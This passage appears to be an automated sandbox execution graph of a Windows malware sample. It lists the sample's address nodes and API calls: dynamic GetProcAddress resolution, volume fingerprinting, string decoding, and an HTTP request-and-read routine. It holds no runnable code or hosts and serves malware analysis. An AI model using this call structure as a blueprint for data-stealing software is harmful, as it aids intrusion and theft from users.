13999->14000 14001 8b45c0 2 API calls 14000->14001 14002 8b29a2 14001->14002 14003 8b45c0 2 API calls 14002->14003 14004 8b29bb 14003->14004 14005 8b45c0 2 API calls 14004->14005 14006 8b29d4 14005->14006 14007 8b45c0 2 API calls 14006->14007 14008 8b29ed 14007->14008 14009 8b45c0 2 API calls 14008->14009 14010 8b2a06 14009->14010 14011 8b45c0 2 API calls 14010->14011 14012 8b2a1f 14011->14012 14013 8b45c0 2 API calls 14012->14013 14014 8b2a38 14013->14014 14015 8b45c0 2 API calls 14014->14015 14016 8b2a51 14015->14016 14017 8b45c0 2 API calls 14016->14017 14018 8b2a6a 14017->14018 14019 8b45c0 2 API calls 14018->14019 14020 8b2a83 14019->14020 14021 8b45c0 2 API calls 14020->14021 14022 8b2a9c 14021->14022 14023 8b45c0 2 API calls 14022->14023 14024 8b2ab5 14023->14024 14025 8b45c0 2 API calls 14024->14025 14026 8b2ace 14025->14026 14027 8b45c0 2 API calls 14026->14027 14028 8b2ae7 14027->14028 14029 8b45c0 2 API calls 14028->14029 14030 8b2b00 14029->14030 14031 8b45c0 2 API calls 14030->14031 14032 8b2b19 14031->14032 14033 8b45c0 2 API calls 14032->14033 14034 8b2b32 14033->14034 14035 8b45c0 2 API calls 14034->14035 14036 8b2b4b 14035->14036 14037 8b45c0 2 API calls 14036->14037 14038 8b2b64 14037->14038 14039 8b45c0 2 API calls 14038->14039 14040 8b2b7d 14039->14040 14041 8b45c0 2 API calls 14040->14041 14042 8b2b96 14041->14042 14043 8b45c0 2 API calls 14042->14043 14044 8b2baf 14043->14044 14045 8b45c0 2 API calls 14044->14045 14046 8b2bc8 14045->14046 14047 8b45c0 2 API calls 14046->14047 14048 8b2be1 14047->14048 14049 8b45c0 2 API calls 14048->14049 14050 8b2bfa 14049->14050 14051 8b45c0 2 API calls 14050->14051 14052 8b2c13 14051->14052 14053 8b45c0 2 API calls 14052->14053 14054 8b2c2c 14053->14054 14055 8b45c0 2 API calls 14054->14055 14056 8b2c45 14055->14056 14057 8b45c0 2 API calls 14056->14057 14058 8b2c5e 14057->14058 14059 8b45c0 2 API calls 14058->14059 14060 8b2c77 14059->14060 14061 8b45c0 2 API calls 14060->14061 14062 8b2c90 14061->14062 
14063 8b45c0 2 API calls 14062->14063 14064 8b2ca9 14063->14064 14065 8b45c0 2 API calls 14064->14065 14066 8b2cc2 14065->14066 14067 8b45c0 2 API calls 14066->14067 14068 8b2cdb 14067->14068 14069 8b45c0 2 API calls 14068->14069 14070 8b2cf4 14069->14070 14071 8b45c0 2 API calls 14070->14071 14072 8b2d0d 14071->14072 14073 8b45c0 2 API calls 14072->14073 14074 8b2d26 14073->14074 14075 8b45c0 2 API calls 14074->14075 14076 8b2d3f 14075->14076 14077 8b45c0 2 API calls 14076->14077 14078 8b2d58 14077->14078 14079 8b45c0 2 API calls 14078->14079 14080 8b2d71 14079->14080 14081 8b45c0 2 API calls 14080->14081 14082 8b2d8a 14081->14082 14083 8b45c0 2 API calls 14082->14083 14084 8b2da3 14083->14084 14085 8b45c0 2 API calls 14084->14085 14086 8b2dbc 14085->14086 14087 8b45c0 2 API calls 14086->14087 14088 8b2dd5 14087->14088 14089 8b45c0 2 API calls 14088->14089 14090 8b2dee 14089->14090 14091 8b45c0 2 API calls 14090->14091 14092 8b2e07 14091->14092 14093 8b45c0 2 API calls 14092->14093 14094 8b2e20 14093->14094 14095 8b45c0 2 API calls 14094->14095 14096 8b2e39 14095->14096 14097 8b45c0 2 API calls 14096->14097 14098 8b2e52 14097->14098 14099 8b45c0 2 API calls 14098->14099 14100 8b2e6b 14099->14100 14101 8b45c0 2 API calls 14100->14101 14102 8b2e84 14101->14102 14103 8b45c0 2 API calls 14102->14103 14104 8b2e9d 14103->14104 14105 8b45c0 2 API calls 14104->14105 14106 8b2eb6 14105->14106 14107 8b45c0 2 API calls 14106->14107 14108 8b2ecf 14107->14108 14109 8b45c0 2 API calls 14108->14109 14110 8b2ee8 14109->14110 14111 8b45c0 2 API calls 14110->14111 14112 8b2f01 14111->14112 14113 8b45c0 2 API calls 14112->14113 14114 8b2f1a 14113->14114 14115 8b45c0 2 API calls 14114->14115 14116 8b2f33 14115->14116 14117 8b45c0 2 API calls 14116->14117 14118 8b2f4c 14117->14118 14119 8b45c0 2 API calls 14118->14119 14120 8b2f65 14119->14120 14121 8b45c0 2 API calls 14120->14121 14122 8b2f7e 14121->14122 14123 8b45c0 2 API calls 14122->14123 14124 8b2f97 14123->14124 14125 8b45c0 2 
API calls 14124->14125 14126 8b2fb0 14125->14126 14127 8b45c0 2 API calls 14126->14127 14128 8b2fc9 14127->14128 14129 8b45c0 2 API calls 14128->14129 14130 8b2fe2 14129->14130 14131 8b45c0 2 API calls 14130->14131 14132 8b2ffb 14131->14132 14133 8b45c0 2 API calls 14132->14133 14134 8b3014 14133->14134 14135 8b45c0 2 API calls 14134->14135 14136 8b302d 14135->14136 14137 8b45c0 2 API calls 14136->14137 14138 8b3046 14137->14138 14139 8b45c0 2 API calls 14138->14139 14140 8b305f 14139->14140 14141 8b45c0 2 API calls 14140->14141 14142 8b3078 14141->14142 14143 8b45c0 2 API calls 14142->14143 14144 8b3091 14143->14144 14145 8b45c0 2 API calls 14144->14145 14146 8b30aa 14145->14146 14147 8b45c0 2 API calls 14146->14147 14148 8b30c3 14147->14148 14149 8b45c0 2 API calls 14148->14149 14150 8b30dc 14149->14150 14151 8b45c0 2 API calls 14150->14151 14152 8b30f5 14151->14152 14153 8b45c0 2 API calls 14152->14153 14154 8b310e 14153->14154 14155 8b45c0 2 API calls 14154->14155 14156 8b3127 14155->14156 14157 8b45c0 2 API calls 14156->14157 14158 8b3140 14157->14158 14159 8b45c0 2 API calls 14158->14159 14160 8b3159 14159->14160 14161 8b45c0 2 API calls 14160->14161 14162 8b3172 14161->14162 14163 8b45c0 2 API calls 14162->14163 14164 8b318b 14163->14164 14165 8b45c0 2 API calls 14164->14165 14166 8b31a4 14165->14166 14167 8b45c0 2 API calls 14166->14167 14168 8b31bd 14167->14168 14169 8b45c0 2 API calls 14168->14169 14170 8b31d6 14169->14170 14171 8b45c0 2 API calls 14170->14171 14172 8b31ef 14171->14172 14173 8b45c0 2 API calls 14172->14173 14174 8b3208 14173->14174 14175 8b45c0 2 API calls 14174->14175 14176 8b3221 14175->14176 14177 8b45c0 2 API calls 14176->14177 14178 8b323a 14177->14178 14179 8b45c0 2 API calls 14178->14179 14180 8b3253 14179->14180 14181 8b45c0 2 API calls 14180->14181 14182 8b326c 14181->14182 14183 8b45c0 2 API calls 14182->14183 14184 8b3285 14183->14184 14185 8b45c0 2 API calls 14184->14185 14186 8b329e 14185->14186 14187 8b45c0 2 API calls 
14186->14187 14188 8b32b7 14187->14188 14189 8b45c0 2 API calls 14188->14189 14190 8b32d0 14189->14190 14191 8b45c0 2 API calls 14190->14191 14192 8b32e9 14191->14192 14193 8b45c0 2 API calls 14192->14193 14194 8b3302 14193->14194 14195 8b45c0 2 API calls 14194->14195 14196 8b331b 14195->14196 14197 8b45c0 2 API calls 14196->14197 14198 8b3334 14197->14198 14199 8b45c0 2 API calls 14198->14199 14200 8b334d 14199->14200 14201 8b45c0 2 API calls 14200->14201 14202 8b3366 14201->14202 14203 8b45c0 2 API calls 14202->14203 14204 8b337f 14203->14204 14205 8b45c0 2 API calls 14204->14205 14206 8b3398 14205->14206 14207 8b45c0 2 API calls 14206->14207 14208 8b33b1 14207->14208 14209 8b45c0 2 API calls 14208->14209 14210 8b33ca 14209->14210 14211 8b45c0 2 API calls 14210->14211 14212 8b33e3 14211->14212 14213 8b45c0 2 API calls 14212->14213 14214 8b33fc 14213->14214 14215 8b45c0 2 API calls 14214->14215 14216 8b3415 14215->14216 14217 8b45c0 2 API calls 14216->14217 14218 8b342e 14217->14218 14219 8b45c0 2 API calls 14218->14219 14220 8b3447 14219->14220 14221 8b45c0 2 API calls 14220->14221 14222 8b3460 14221->14222 14223 8b45c0 2 API calls 14222->14223 14224 8b3479 14223->14224 14225 8b45c0 2 API calls 14224->14225 14226 8b3492 14225->14226 14227 8b45c0 2 API calls 14226->14227 14228 8b34ab 14227->14228 14229 8b45c0 2 API calls 14228->14229 14230 8b34c4 14229->14230 14231 8b45c0 2 API calls 14230->14231 14232 8b34dd 14231->14232 14233 8b45c0 2 API calls 14232->14233 14234 8b34f6 14233->14234 14235 8b45c0 2 API calls 14234->14235 14236 8b350f 14235->14236 14237 8b45c0 2 API calls 14236->14237 14238 8b3528 14237->14238 14239 8b45c0 2 API calls 14238->14239 14240 8b3541 14239->14240 14241 8b45c0 2 API calls 14240->14241 14242 8b355a 14241->14242 14243 8b45c0 2 API calls 14242->14243 14244 8b3573 14243->14244 14245 8b45c0 2 API calls 14244->14245 14246 8b358c 14245->14246 14247 8b45c0 2 API calls 14246->14247 14248 8b35a5 14247->14248 14249 8b45c0 2 API calls 14248->14249 
14250 8b35be 14249->14250 14251 8b45c0 2 API calls 14250->14251 14252 8b35d7 14251->14252 14253 8b45c0 2 API calls 14252->14253 14254 8b35f0 14253->14254 14255 8b45c0 2 API calls 14254->14255 14256 8b3609 14255->14256 14257 8b45c0 2 API calls 14256->14257 14258 8b3622 14257->14258 14259 8b45c0 2 API calls 14258->14259 14260 8b363b 14259->14260 14261 8b45c0 2 API calls 14260->14261 14262 8b3654 14261->14262 14263 8b45c0 2 API calls 14262->14263 14264 8b366d 14263->14264 14265 8b45c0 2 API calls 14264->14265 14266 8b3686 14265->14266 14267 8b45c0 2 API calls 14266->14267 14268 8b369f 14267->14268 14269 8b45c0 2 API calls 14268->14269 14270 8b36b8 14269->14270 14271 8b45c0 2 API calls 14270->14271 14272 8b36d1 14271->14272 14273 8b45c0 2 API calls 14272->14273 14274 8b36ea 14273->14274 14275 8b45c0 2 API calls 14274->14275 14276 8b3703 14275->14276 14277 8b45c0 2 API calls 14276->14277 14278 8b371c 14277->14278 14279 8b45c0 2 API calls 14278->14279 14280 8b3735 14279->14280 14281 8b45c0 2 API calls 14280->14281 14282 8b374e 14281->14282 14283 8b45c0 2 API calls 14282->14283 14284 8b3767 14283->14284 14285 8b45c0 2 API calls 14284->14285 14286 8b3780 14285->14286 14287 8b45c0 2 API calls 14286->14287 14288 8b3799 14287->14288 14289 8b45c0 2 API calls 14288->14289 14290 8b37b2 14289->14290 14291 8b45c0 2 API calls 14290->14291 14292 8b37cb 14291->14292 14293 8b45c0 2 API calls 14292->14293 14294 8b37e4 14293->14294 14295 8b45c0 2 API calls 14294->14295 14296 8b37fd 14295->14296 14297 8b45c0 2 API calls 14296->14297 14298 8b3816 14297->14298 14299 8b45c0 2 API calls 14298->14299 14300 8b382f 14299->14300 14301 8b45c0 2 API calls 14300->14301 14302 8b3848 14301->14302 14303 8b45c0 2 API calls 14302->14303 14304 8b3861 14303->14304 14305 8b45c0 2 API calls 14304->14305 14306 8b387a 14305->14306 14307 8b45c0 2 API calls 14306->14307 14308 8b3893 14307->14308 14309 8b45c0 2 API calls 14308->14309 14310 8b38ac 14309->14310 14311 8b45c0 2 API calls 14310->14311 14312 8b38c5 
14311->14312 14313 8b45c0 2 API calls 14312->14313 14314 8b38de 14313->14314 14315 8b45c0 2 API calls 14314->14315 14316 8b38f7 14315->14316 14317 8b45c0 2 API calls 14316->14317 14318 8b3910 14317->14318 14319 8b45c0 2 API calls 14318->14319 14320 8b3929 14319->14320 14321 8b45c0 2 API calls 14320->14321 14322 8b3942 14321->14322 14323 8b45c0 2 API calls 14322->14323 14324 8b395b 14323->14324 14325 8b45c0 2 API calls 14324->14325 14326 8b3974 14325->14326 14327 8b45c0 2 API calls 14326->14327 14328 8b398d 14327->14328 14329 8b45c0 2 API calls 14328->14329 14330 8b39a6 14329->14330 14331 8b45c0 2 API calls 14330->14331 14332 8b39bf 14331->14332 14333 8b45c0 2 API calls 14332->14333 14334 8b39d8 14333->14334 14335 8b45c0 2 API calls 14334->14335 14336 8b39f1 14335->14336 14337 8b45c0 2 API calls 14336->14337 14338 8b3a0a 14337->14338 14339 8b45c0 2 API calls 14338->14339 14340 8b3a23 14339->14340 14341 8b45c0 2 API calls 14340->14341 14342 8b3a3c 14341->14342 14343 8b45c0 2 API calls 14342->14343 14344 8b3a55 14343->14344 14345 8b45c0 2 API calls 14344->14345 14346 8b3a6e 14345->14346 14347 8b45c0 2 API calls 14346->14347 14348 8b3a87 14347->14348 14349 8b45c0 2 API calls 14348->14349 14350 8b3aa0 14349->14350 14351 8b45c0 2 API calls 14350->14351 14352 8b3ab9 14351->14352 14353 8b45c0 2 API calls 14352->14353 14354 8b3ad2 14353->14354 14355 8b45c0 2 API calls 14354->14355 14356 8b3aeb 14355->14356 14357 8b45c0 2 API calls 14356->14357 14358 8b3b04 14357->14358 14359 8b45c0 2 API calls 14358->14359 14360 8b3b1d 14359->14360 14361 8b45c0 2 API calls 14360->14361 14362 8b3b36 14361->14362 14363 8b45c0 2 API calls 14362->14363 14364 8b3b4f 14363->14364 14365 8b45c0 2 API calls 14364->14365 14366 8b3b68 14365->14366 14367 8b45c0 2 API calls 14366->14367 14368 8b3b81 14367->14368 14369 8b45c0 2 API calls 14368->14369 14370 8b3b9a 14369->14370 14371 8b45c0 2 API calls 14370->14371 14372 8b3bb3 14371->14372 14373 8b45c0 2 API calls 14372->14373 14374 8b3bcc 14373->14374 
14375 8b45c0 2 API calls 14374->14375 14376 8b3be5 14375->14376 14377 8b45c0 2 API calls 14376->14377 14378 8b3bfe 14377->14378 14379 8b45c0 2 API calls 14378->14379 14380 8b3c17 14379->14380 14381 8b45c0 2 API calls 14380->14381 14382 8b3c30 14381->14382 14383 8b45c0 2 API calls 14382->14383 14384 8b3c49 14383->14384 14385 8b45c0 2 API calls 14384->14385 14386 8b3c62 14385->14386 14387 8b45c0 2 API calls 14386->14387 14388 8b3c7b 14387->14388 14389 8b45c0 2 API calls 14388->14389 14390 8b3c94 14389->14390 14391 8b45c0 2 API calls 14390->14391 14392 8b3cad 14391->14392 14393 8b45c0 2 API calls 14392->14393 14394 8b3cc6 14393->14394 14395 8b45c0 2 API calls 14394->14395 14396 8b3cdf 14395->14396 14397 8b45c0 2 API calls 14396->14397 14398 8b3cf8 14397->14398 14399 8b45c0 2 API calls 14398->14399 14400 8b3d11 14399->14400 14401 8b45c0 2 API calls 14400->14401 14402 8b3d2a 14401->14402 14403 8b45c0 2 API calls 14402->14403 14404 8b3d43 14403->14404 14405 8b45c0 2 API calls 14404->14405 14406 8b3d5c 14405->14406 14407 8b45c0 2 API calls 14406->14407 14408 8b3d75 14407->14408 14409 8b45c0 2 API calls 14408->14409 14410 8b3d8e 14409->14410 14411 8b45c0 2 API calls 14410->14411 14412 8b3da7 14411->14412 14413 8b45c0 2 API calls 14412->14413 14414 8b3dc0 14413->14414 14415 8b45c0 2 API calls 14414->14415 14416 8b3dd9 14415->14416 14417 8b45c0 2 API calls 14416->14417 14418 8b3df2 14417->14418 14419 8b45c0 2 API calls 14418->14419 14420 8b3e0b 14419->14420 14421 8b45c0 2 API calls 14420->14421 14422 8b3e24 14421->14422 14423 8b45c0 2 API calls 14422->14423 14424 8b3e3d 14423->14424 14425 8b45c0 2 API calls 14424->14425 14426 8b3e56 14425->14426 14427 8b45c0 2 API calls 14426->14427 14428 8b3e6f 14427->14428 14429 8b45c0 2 API calls 14428->14429 14430 8b3e88 14429->14430 14431 8b45c0 2 API calls 14430->14431 14432 8b3ea1 14431->14432 14433 8b45c0 2 API calls 14432->14433 14434 8b3eba 14433->14434 14435 8b45c0 2 API calls 14434->14435 14436 8b3ed3 14435->14436 14437 8b45c0 2 
API calls 14436->14437 14438 8b3eec 14437->14438 14439 8b45c0 2 API calls 14438->14439 14440 8b3f05 14439->14440 14441 8b45c0 2 API calls 14440->14441 14442 8b3f1e 14441->14442 14443 8b45c0 2 API calls 14442->14443 14444 8b3f37 14443->14444 14445 8b45c0 2 API calls 14444->14445 14446 8b3f50 14445->14446 14447 8b45c0 2 API calls 14446->14447 14448 8b3f69 14447->14448 14449 8b45c0 2 API calls 14448->14449 14450 8b3f82 14449->14450 14451 8b45c0 2 API calls 14450->14451 14452 8b3f9b 14451->14452 14453 8b45c0 2 API calls 14452->14453 14454 8b3fb4 14453->14454 14455 8b45c0 2 API calls 14454->14455 14456 8b3fcd 14455->14456 14457 8b45c0 2 API calls 14456->14457 14458 8b3fe6 14457->14458 14459 8b45c0 2 API calls 14458->14459 14460 8b3fff 14459->14460 14461 8b45c0 2 API calls 14460->14461 14462 8b4018 14461->14462 14463 8b45c0 2 API calls 14462->14463 14464 8b4031 14463->14464 14465 8b45c0 2 API calls 14464->14465 14466 8b404a 14465->14466 14467 8b45c0 2 API calls 14466->14467 14468 8b4063 14467->14468 14469 8b45c0 2 API calls 14468->14469 14470 8b407c 14469->14470 14471 8b45c0 2 API calls 14470->14471 14472 8b4095 14471->14472 14473 8b45c0 2 API calls 14472->14473 14474 8b40ae 14473->14474 14475 8b45c0 2 API calls 14474->14475 14476 8b40c7 14475->14476 14477 8b45c0 2 API calls 14476->14477 14478 8b40e0 14477->14478 14479 8b45c0 2 API calls 14478->14479 14480 8b40f9 14479->14480 14481 8b45c0 2 API calls 14480->14481 14482 8b4112 14481->14482 14483 8b45c0 2 API calls 14482->14483 14484 8b412b 14483->14484 14485 8b45c0 2 API calls 14484->14485 14486 8b4144 14485->14486 14487 8b45c0 2 API calls 14486->14487 14488 8b415d 14487->14488 14489 8b45c0 2 API calls 14488->14489 14490 8b4176 14489->14490 14491 8b45c0 2 API calls 14490->14491 14492 8b418f 14491->14492 14493 8b45c0 2 API calls 14492->14493 14494 8b41a8 14493->14494 14495 8b45c0 2 API calls 14494->14495 14496 8b41c1 14495->14496 14497 8b45c0 2 API calls 14496->14497 14498 8b41da 14497->14498 14499 8b45c0 2 API calls 
14498->14499 14500 8b41f3 14499->14500 14501 8b45c0 2 API calls 14500->14501 14502 8b420c 14501->14502 14503 8b45c0 2 API calls 14502->14503 14504 8b4225 14503->14504 14505 8b45c0 2 API calls 14504->14505 14506 8b423e 14505->14506 14507 8b45c0 2 API calls 14506->14507 14508 8b4257 14507->14508 14509 8b45c0 2 API calls 14508->14509 14510 8b4270 14509->14510 14511 8b45c0 2 API calls 14510->14511 14512 8b4289 14511->14512 14513 8b45c0 2 API calls 14512->14513 14514 8b42a2 14513->14514 14515 8b45c0 2 API calls 14514->14515 14516 8b42bb 14515->14516 14517 8b45c0 2 API calls 14516->14517 14518 8b42d4 14517->14518 14519 8b45c0 2 API calls 14518->14519 14520 8b42ed 14519->14520 14521 8b45c0 2 API calls 14520->14521 14522 8b4306 14521->14522 14523 8b45c0 2 API calls 14522->14523 14524 8b431f 14523->14524 14525 8b45c0 2 API calls 14524->14525 14526 8b4338 14525->14526 14527 8b45c0 2 API calls 14526->14527 14528 8b4351 14527->14528 14529 8b45c0 2 API calls 14528->14529 14530 8b436a 14529->14530 14531 8b45c0 2 API calls 14530->14531 14532 8b4383 14531->14532 14533 8b45c0 2 API calls 14532->14533 14534 8b439c 14533->14534 14535 8b45c0 2 API calls 14534->14535 14536 8b43b5 14535->14536 14537 8b45c0 2 API calls 14536->14537 14538 8b43ce 14537->14538 14539 8b45c0 2 API calls 14538->14539 14540 8b43e7 14539->14540 14541 8b45c0 2 API calls 14540->14541 14542 8b4400 14541->14542 14543 8b45c0 2 API calls 14542->14543 14544 8b4419 14543->14544 14545 8b45c0 2 API calls 14544->14545 14546 8b4432 14545->14546 14547 8b45c0 2 API calls 14546->14547 14548 8b444b 14547->14548 14549 8b45c0 2 API calls 14548->14549 14550 8b4464 14549->14550 14551 8b45c0 2 API calls 14550->14551 14552 8b447d 14551->14552 14553 8b45c0 2 API calls 14552->14553 14554 8b4496 14553->14554 14555 8b45c0 2 API calls 14554->14555 14556 8b44af 14555->14556 14557 8b45c0 2 API calls 14556->14557 14558 8b44c8 14557->14558 14559 8b45c0 2 API calls 14558->14559 14560 8b44e1 14559->14560 14561 8b45c0 2 API calls 14560->14561 
14562 8b44fa 14561->14562 14563 8b45c0 2 API calls 14562->14563 14564 8b4513 14563->14564 14565 8b45c0 2 API calls 14564->14565 14566 8b452c 14565->14566 14567 8b45c0 2 API calls 14566->14567 14568 8b4545 14567->14568 14569 8b45c0 2 API calls 14568->14569 14570 8b455e 14569->14570 14571 8b45c0 2 API calls 14570->14571 14572 8b4577 14571->14572 14573 8b45c0 2 API calls 14572->14573 14574 8b4590 14573->14574 14575 8b45c0 2 API calls 14574->14575 14576 8b45a9 14575->14576 14577 8c9c10 14576->14577 14578 8ca036 8 API calls 14577->14578 14579 8c9c20 43 API calls 14577->14579 14580 8ca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14578->14580 14581 8ca146 14578->14581 14579->14578 14580->14581 14582 8ca216 14581->14582 14583 8ca153 8 API calls 14581->14583 14584 8ca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14582->14584 14585 8ca298 14582->14585 14583->14582 14584->14585 14586 8ca2a5 6 API calls 14585->14586 14587 8ca337 14585->14587 14586->14587 14588 8ca41f 14587->14588 14589 8ca344 9 API calls 14587->14589 14590 8ca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14588->14590 14591 8ca4a2 14588->14591 14589->14588 14590->14591 14592 8ca4dc 14591->14592 14593 8ca4ab GetProcAddress GetProcAddress 14591->14593 14594 8ca515 14592->14594 14595 8ca4e5 GetProcAddress GetProcAddress 14592->14595 14593->14592 14596 8ca612 14594->14596 14597 8ca522 10 API calls 14594->14597 14595->14594 14598 8ca67d 14596->14598 14599 8ca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14596->14599 14597->14596 14600 8ca69e 14598->14600 14601 8ca686 GetProcAddress 14598->14601 14599->14598 14602 8c5ca3 14600->14602 14603 8ca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14600->14603 14601->14600 14604 8b1590 14602->14604 14603->14602 15725 8b1670 14604->15725 14607 8ca7a0 lstrcpy 14608 8b15b5 14607->14608 14609 8ca7a0 lstrcpy 14608->14609 14610 8b15c7 14609->14610 
14611 8ca7a0 lstrcpy 14610->14611 14612 8b15d9 14611->14612 14613 8ca7a0 lstrcpy 14612->14613 14614 8b1663 14613->14614 14615 8c5510 14614->14615 14616 8c5521 14615->14616 14617 8ca820 2 API calls 14616->14617 14618 8c552e 14617->14618 14619 8ca820 2 API calls 14618->14619 14620 8c553b 14619->14620 14621 8ca820 2 API calls 14620->14621 14622 8c5548 14621->14622 14623 8ca740 lstrcpy 14622->14623 14624 8c5555 14623->14624 14625 8ca740 lstrcpy 14624->14625 14626 8c5562 14625->14626 14627 8ca740 lstrcpy 14626->14627 14628 8c556f 14627->14628 14629 8ca740 lstrcpy 14628->14629 14667 8c557c 14629->14667 14630 8ca7a0 lstrcpy 14630->14667 14631 8ca740 lstrcpy 14631->14667 14632 8c5643 StrCmpCA 14632->14667 14633 8c56a0 StrCmpCA 14634 8c57dc 14633->14634 14633->14667 14635 8ca8a0 lstrcpy 14634->14635 14636 8c57e8 14635->14636 14637 8ca820 2 API calls 14636->14637 14639 8c57f6 14637->14639 14638 8ca820 lstrlen lstrcpy 14638->14667 14642 8ca820 2 API calls 14639->14642 14640 8c5856 StrCmpCA 14643 8c5991 14640->14643 14640->14667 14641 8c51f0 20 API calls 14641->14667 14645 8c5805 14642->14645 14644 8ca8a0 lstrcpy 14643->14644 14646 8c599d 14644->14646 14647 8b1670 lstrcpy 14645->14647 14649 8ca820 2 API calls 14646->14649 14669 8c5811 14647->14669 14648 8b1590 lstrcpy 14648->14667 14650 8c59ab 14649->14650 14653 8ca820 2 API calls 14650->14653 14651 8c5a0b StrCmpCA 14654 8c5a28 14651->14654 14655 8c5a16 Sleep 14651->14655 14652 8c52c0 25 API calls 14652->14667 14656 8c59ba 14653->14656 14657 8ca8a0 lstrcpy 14654->14657 14655->14667 14658 8b1670 lstrcpy 14656->14658 14659 8c5a34 14657->14659 14658->14669 14660 8ca820 2 API calls 14659->14660 14661 8c5a43 14660->14661 14662 8ca820 2 API calls 14661->14662 14663 8c5a52 14662->14663 14666 8b1670 lstrcpy 14663->14666 14664 8ca8a0 lstrcpy 14664->14667 14665 8c578a StrCmpCA 14665->14667 14666->14669 14667->14630 14667->14631 14667->14632 14667->14633 14667->14638 14667->14640 14667->14641 14667->14648 14667->14651 14667->14652 
14667->14664 14667->14665 14668 8c593f StrCmpCA 14667->14668 14668->14667 14669->13722 14671 8c754c 14670->14671 14672 8c7553 GetVolumeInformationA 14670->14672 14671->14672 14673 8c7591 14672->14673 14674 8c75fc GetProcessHeap RtlAllocateHeap 14673->14674 14675 8c7628 wsprintfA 14674->14675 14676 8c7619 14674->14676 14677 8ca740 lstrcpy 14675->14677 14678 8ca740 lstrcpy 14676->14678 14679 8c5da7 14677->14679 14678->14679 14679->13743 14681 8ca7a0 lstrcpy 14680->14681 14682 8b4899 14681->14682 15734 8b47b0 14682->15734 14684 8b48a5 14685 8ca740 lstrcpy 14684->14685 14686 8b48d7 14685->14686 14687 8ca740 lstrcpy 14686->14687 14688 8b48e4 14687->14688 14689 8ca740 lstrcpy 14688->14689 14690 8b48f1 14689->14690 14691 8ca740 lstrcpy 14690->14691 14692 8b48fe 14691->14692 14693 8ca740 lstrcpy 14692->14693 14694 8b490b InternetOpenA StrCmpCA 14693->14694 14695 8b4944 14694->14695 14696 8b4ecb InternetCloseHandle 14695->14696 15740 8c8b60 14695->15740 14698 8b4ee8 14696->14698 15755 8b9ac0 CryptStringToBinaryA 14698->15755 14699 8b4963 15748 8ca920 14699->15748 14702 8b4976 14704 8ca8a0 lstrcpy 14702->14704 14709 8b497f 14704->14709 14705 8ca820 2 API calls 14706 8b4f05 14705->14706 14708 8ca9b0 4 API calls 14706->14708 14707 8b4f27 ctype 14711 8ca7a0 lstrcpy 14707->14711 14710 8b4f1b 14708->14710 14713 8ca9b0 4 API calls 14709->14713 14712 8ca8a0 lstrcpy 14710->14712 14724 8b4f57 14711->14724 14712->14707 14714 8b49a9 14713->14714 14715 8ca8a0 lstrcpy 14714->14715 14716 8b49b2 14715->14716 14717 8ca9b0 4 API calls 14716->14717 14718 8b49d1 14717->14718 14719 8ca8a0 lstrcpy 14718->14719 14720 8b49da 14719->14720 14721 8ca920 3 API calls 14720->14721 14722 8b49f8 14721->14722 14723 8ca8a0 lstrcpy 14722->14723 14725 8b4a01 14723->14725 14724->13746 14726 8ca9b0 4 API calls 14725->14726 14727 8b4a20 14726->14727 14728 8ca8a0 lstrcpy 14727->14728 14729 8b4a29 14728->14729 14730 8ca9b0 4 API calls 14729->14730 14731 8b4a48 14730->14731 14732 8ca8a0 lstrcpy 14731->14732 14733 
8b4a51 14732->14733 14734 8ca9b0 4 API calls 14733->14734 14735 8b4a7d 14734->14735 14736 8ca920 3 API calls 14735->14736 14737 8b4a84 14736->14737 14738 8ca8a0 lstrcpy 14737->14738 14739 8b4a8d 14738->14739 14740 8b4aa3 InternetConnectA 14739->14740 14740->14696 14741 8b4ad3 HttpOpenRequestA 14740->14741 14743 8b4b28 14741->14743 14744 8b4ebe InternetCloseHandle 14741->14744 14745 8ca9b0 4 API calls 14743->14745 14744->14696 14746 8b4b3c 14745->14746 14747 8ca8a0 lstrcpy 14746->14747 14748 8b4b45 14747->14748 14749 8ca920 3 API calls 14748->14749 14750 8b4b63 14749->14750 14751 8ca8a0 lstrcpy 14750->14751 14752 8b4b6c 14751->14752 14753 8ca9b0 4 API calls 14752->14753 14754 8b4b8b 14753->14754 14755 8ca8a0 lstrcpy 14754->14755 14756 8b4b94 14755->14756 14757 8ca9b0 4 API calls 14756->14757 14758 8b4bb5 14757->14758 14759 8ca8a0 lstrcpy 14758->14759 14760 8b4bbe 14759->14760 14761 8ca9b0 4 API calls 14760->14761 14762 8b4bde 14761->14762 14763 8ca8a0 lstrcpy 14762->14763 14764 8b4be7 14763->14764 14765 8ca9b0 4 API calls 14764->14765 14766 8b4c06 14765->14766 14767 8ca8a0 lstrcpy 14766->14767 14768 8b4c0f 14767->14768 14769 8ca920 3 API calls 14768->14769 14770 8b4c2d 14769->14770 14771 8ca8a0 lstrcpy 14770->14771 14772 8b4c36 14771->14772 14773 8ca9b0 4 API calls 14772->14773 14774 8b4c55 14773->14774 14775 8ca8a0 lstrcpy 14774->14775 14776 8b4c5e 14775->14776 14777 8ca9b0 4 API calls 14776->14777 14778 8b4c7d 14777->14778 14779 8ca8a0 lstrcpy 14778->14779 14780 8b4c86 14779->14780 14781 8ca920 3 API calls 14780->14781 14782 8b4ca4 14781->14782 14783 8ca8a0 lstrcpy 14782->14783 14784 8b4cad 14783->14784 14785 8ca9b0 4 API calls 14784->14785 14786 8b4ccc 14785->14786 14787 8ca8a0 lstrcpy 14786->14787 14788 8b4cd5 14787->14788 14789 8ca9b0 4 API calls 14788->14789 14790 8b4cf6 14789->14790 14791 8ca8a0 lstrcpy 14790->14791 14792 8b4cff 14791->14792 14793 8ca9b0 4 API calls 14792->14793 14794 8b4d1f 14793->14794 14795 8ca8a0 lstrcpy 14794->14795 14796 8b4d28 
Execution Graph (the rendered node/edge graph does not survive extraction; the per-function API names recoverable from its node labels are listed below, string helpers 8ca740/8ca7a0/8ca8a0/8ca920/8ca9b0/8ca820 = lstrcpy/lstrlen/lstrcat wrappers)
• 8b4d47-8b4e67: builds request strings, then HttpSendRequestA, InternetReadFile loop, InternetCloseHandle
• 8c17c4-8c19c2: chain of StrCmpCA comparisons; the first mismatch branch (8c17cf) calls ExitProcess
